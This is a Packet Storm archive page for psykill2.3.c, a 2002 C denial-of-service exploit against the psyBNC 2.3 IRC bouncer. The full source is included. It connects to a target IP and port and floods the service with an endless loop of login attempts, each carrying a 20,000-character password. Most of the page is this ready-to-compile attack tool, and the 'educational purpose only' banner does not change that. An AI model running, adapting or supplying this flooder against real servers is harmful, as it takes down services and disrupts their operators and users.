exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

psykill2.3.c

psykill2.3.c
Posted May 14, 2002
Authored by Guile Cool

Psybnc v2.3 denial of service exploit. Sends a 20000 character password.

tags | denial of service
SHA-256 | b68a05e384ec52f9ec173ea2e8f4f7a4510a639aefa527c2297b94830460519a

psykill2.3.c

Change Mirror Download
/*
*
* -()- The ImperialS -()-
*
* CONFIDENTIAL - SOURCE MATERIALS
* You are not allowed to reproduce this software without ImperialS
* security's team permissions.
*
* EDUCATIONAL PURPOSE ONLY !!!
********************************************************************************
*
* (C) COPYRIGHT ImperialS Security, 2002
* All Rights Reserved
* SUBJECT: PsyBnc DoS discovered by DVDMAN (DVDMAN@L33TSECURITY.COM)
*
* AUTHOR: Guilecool 22/04/2002
*
* Greetz: Azekiel, case, TheViper, kraz|, Nyo, anakata and all #imperialspub ppl.
*
*********************************************************************************
*
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <signal.h>

void addr_initialize();
void usage();
void handle_sigtrap();


main (int argc, char *argv[])
{
int sd, i, error;
struct sockaddr_in server_addr;
char user[] = "USER imps 127.0.0.1 127.0.0.1 :*\n";
char nick[] = "NICK ImperialS\n";
char passwd[21100];
char pwd[22000];
char ch[1024];
int PORT = atoi(argv[2]);
if(argc!=3) usage();
addr_initialize(&server_addr, PORT, (long)inet_addr(argv[1]));
signal(SIGPIPE, handle_sigtrap);
sd = socket(AF_INET, SOCK_STREAM, 0);
error = connect(sd, (struct sockaddr *) &server_addr, sizeof(server_addr));
printf("\nPsyBnc 2.3 FlooDer by Guilecool -()- The ImperialS -()-\n");
sleep(3);
for (i=0; i<20000; i++) passwd[i] = 'A';
sprintf(pwd, "PASS %s\n", passwd);

if (error == 0)
{
while(1) {
send(sd, user, strlen(user)+1, 0);
sleep(1);
send(sd, nick, strlen(nick)+1, 0);
sleep(5);
send(sd, pwd, strlen(pwd)+1, 0);
// recv(sd, ch, strlen(ch), 0); //Put it if u wanna recv the response
}
}
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
address -> sin_family = AF_INET;
address -> sin_port = htons((u_short)port);
address -> sin_addr.s_addr = IPaddr;
}

void usage(int argc, char **argv)
{
fprintf(stdout, "\nUSAGE: <%s> <IP> <PORT>\n", argv[0]);
exit(0);
}

void handle_sigtrap (int signal) // anakata !!!!!!!!
{
printf("Disconnected.\n");
exit(0);
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close